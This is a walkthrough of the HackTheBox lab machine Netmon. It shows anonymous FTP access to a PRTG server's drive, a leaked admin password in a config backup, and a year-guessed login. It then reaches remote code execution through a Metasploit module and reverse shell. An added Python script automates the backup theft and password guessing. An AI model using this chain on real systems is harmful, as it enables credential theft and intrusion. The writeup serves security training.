Netmon
Netmon writeup by Thamizhiniyan C S
Last updated
Hello everyone! In this writeup we are going to solve Netmon from HackTheBox.
Link to the machine: https://app.hackthebox.com/machines/177
Let's start 🙌
Connect to the HTB server using the OpenVPN configuration file generated by HTB.
[ Click Here to learn more about how to connect to vpn and access the boxes. ]
After connecting to the VPN, click on Join Machine; the IP address of the target machine is then shown.
First, scan the target. I use rustscan; use your favourite tool.
Command: rustscan -a 10.10.10.152 -- -A -T4 -v -Pn
The scan found the following ports and services:
Port | Service | Version |
---|---|---|
21 | FTP (anonymous login allowed) | Microsoft ftpd |
80 | HTTP | Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) |
135 | msrpc | Microsoft Windows RPC |
139 | netbios-ssn | Microsoft Windows netbios-ssn |
445 | microsoft-ds | Microsoft Windows Server 2008 R2 - 2012 microsoft-ds |
47001 | HTTP | Microsoft HTTPAPI httpd 2.0 |
49664 | msrpc | Microsoft Windows RPC |
49665 | msrpc | Microsoft Windows RPC |
49666 | msrpc | Microsoft Windows RPC |
49667 | msrpc | Microsoft Windows RPC |
49668 | msrpc | Microsoft Windows RPC |
49669 | msrpc | Microsoft Windows RPC |
I first ran enum4linux to enumerate the SMB shares, but found nothing.
Next I visited the website running on port 80 and found the welcome page shown above. The application is PRTG Network Monitor. I googled the version string Indy httpd 18.1.37.13946 from the scan and got the following:
PRTG 18.1.37 is vulnerable to an authenticated RCE (CVE-2018-9276, an OS command injection in the sensor/notification settings, fixed in 18.2.39). Because the injection sits behind the admin web console, we need valid credentials before the exploit is of any use. So I moved on to enumerating FTP.
Since anonymous login is allowed on the FTP service, I logged in as anonymous.
Surfing around the files on the FTP server, I found the user flag in the C:\Users\Public directory and used the more command to view the contents of user.txt.
Surfing further, I found that the anonymous FTP root exposes the whole system drive, including the program data directories. So I googled where the PRTG configuration files are stored and got this:
I checked the C:\ProgramData\Paessler\PRTG Network Monitor directory and found the following:
I first viewed the contents of PRTG Configuration.dat and found nothing usable: the live configuration does not hold the password in the clear. PRTG Configuration.old was the same. Then I checked the older backup, PRTG Configuration.old.bak, and found the following:
Found the credentials prtgadmin:PrTg@dmin2018 and tried them on the PRTG Network Monitor portal, but the login failed. Since the credential came from an old backup, the password has probably been rotated since. This machine was released in 2019 and the password embeds a year, so following that pattern the natural guess is PrTg@dmin2019. I tried it and it worked!
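The three steps above (pull the backup over anonymous FTP, pick the clear-text password out of it, then try the year-rotated variants against the login form) are scripted below as an added example; this is not code from the original writeup or from Paessler. The configuration snippets are constructed, loosely modelled on the layout of PRTG Configuration.old.bak, and the login form fields, the /public/checklogin.htm endpoint and the redirect-on-success behaviour are assumptions about PRTG 18.x rather than facts stated on the page. The target address 10.10.10.152 is the only value taken from the page.

```python
"""Recover a PRTG password from a configuration backup and test year-rotated variants.

Added example for this writeup. Assumed (not from the page): the login form fields
username/password/loginurl, the endpoint /public/checklogin.htm, and that a good
login answers with a 3xx redirect away from the login page.
"""
import re
import urllib.error
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET
from ftplib import FTP
from typing import Dict, List

# Constructed sample of a live config: the password carries an <encrypted/> flag.
SAMPLE_LIVE = """<prtg><data><dbcredentials>
  <dbauth>1</dbauth>
  <dbpassword>
    <flags><encrypted/></flags>
    CONSTRUCTED-ENCRYPTED-BLOB-PLACEHOLDER
  </dbpassword>
  <dbuser>prtgadmin</dbuser>
</dbcredentials></data></prtg>"""

# Constructed sample of an older backup: same entry, password still in the clear.
SAMPLE_BACKUP = """<prtg><data><dbcredentials>
  <dbauth>1</dbauth>
  <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
  </dbpassword>
  <dbuser>prtgadmin</dbuser>
</dbcredentials></data></prtg>"""


def fetch_via_anonymous_ftp(host: str, remote_path: str) -> bytes:
    """Download one file over anonymous FTP (ftplib sends USER anonymous / PASS anonymous@)."""
    chunks: List[bytes] = []
    with FTP(host, timeout=10) as ftp:
        ftp.login()
        ftp.retrbinary(f"RETR {remote_path}", chunks.append)
    return b"".join(chunks)


def extract_plaintext_db_passwords(config_xml: str) -> List[Dict[str, str]]:
    """Return user/password pairs whose <dbpassword> is NOT flagged <encrypted/>.

    ElementTree drops XML comments, so the clear-text value is simply the element's
    remaining text; the user name is taken from the sibling <dbuser> element.
    """
    root = ET.fromstring(config_xml)
    found = []
    for cred in root.iter("dbcredentials"):
        pw = cred.find("dbpassword")
        if pw is None or pw.find("flags/encrypted") is not None:
            continue  # absent, or stored encrypted: nothing to recover
        value = "".join(pw.itertext()).strip()
        if not value:
            continue
        user_el = cred.find("dbuser")
        user = (user_el.text or "").strip() if user_el is not None else ""
        found.append({"user": user, "password": value})
    return found


YEAR_SUFFIX = re.compile(r"^(?P<stem>.*?)(?P<year>(?:19|20)\d{2})$")


def year_candidates(password: str, up_to_year: int) -> List[str]:
    """If the password ends in a four-digit year, return the stem with each later year."""
    m = YEAR_SUFFIX.match(password)
    if not m:
        return []
    stem, year = m.group("stem"), int(m.group("year"))
    return [f"{stem}{y}" for y in range(year + 1, up_to_year + 1)]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses instead of following them, so we can inspect Location."""

    def redirect_request(self, *args, **kwargs):
        return None


def prtg_login_ok(base_url: str, username: str, password: str) -> bool:
    """POST the (assumed) PRTG login form; a redirect away from the login page counts as success."""
    data = urllib.parse.urlencode(
        {"username": username, "password": password, "loginurl": ""}
    ).encode()
    req = urllib.request.Request(f"{base_url}/public/checklogin.htm", data=data, method="POST")
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        resp = opener.open(req, timeout=10)
    except urllib.error.HTTPError as e:
        resp = e  # with redirects disabled, a 3xx is raised as HTTPError
    location = resp.headers.get("Location", "")
    return resp.getcode() in (301, 302, 303) and "login" not in location.lower()


if __name__ == "__main__":
    host = "10.10.10.152"  # from the page; the path below is the directory the writeup found
    backup = fetch_via_anonymous_ftp(
        host, "/ProgramData/Paessler/PRTG Network Monitor/PRTG Configuration.old.bak"
    )
    for cred in extract_plaintext_db_passwords(backup.decode("utf-8", errors="replace")):
        for candidate in [cred["password"]] + year_candidates(cred["password"], 2019):
            if prtg_login_ok(f"http://{host}", cred["user"], candidate):
                print(f"valid login: {cred['user']}:{candidate}")
                break
```

The check worth keeping from this is the `<encrypted/>` flag test: a password element without it is a clear-text credential, which is exactly why an old .bak beside a sanitised live .dat is the file to read first. Raise `up_to_year` if you are working a box released later than 2019.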
We are now logged in with valid credentials. As described on the following site, we can use Metasploit (the exploit/windows/http/prtg_authenticated_rce module, which needs the PRTG admin username and password as options) to exploit this vulnerability.
Run the exploit.
We got a meterpreter reverse shell back.
The root flag is in the C:\Users\Administrator\Desktop directory.
Thank You !!!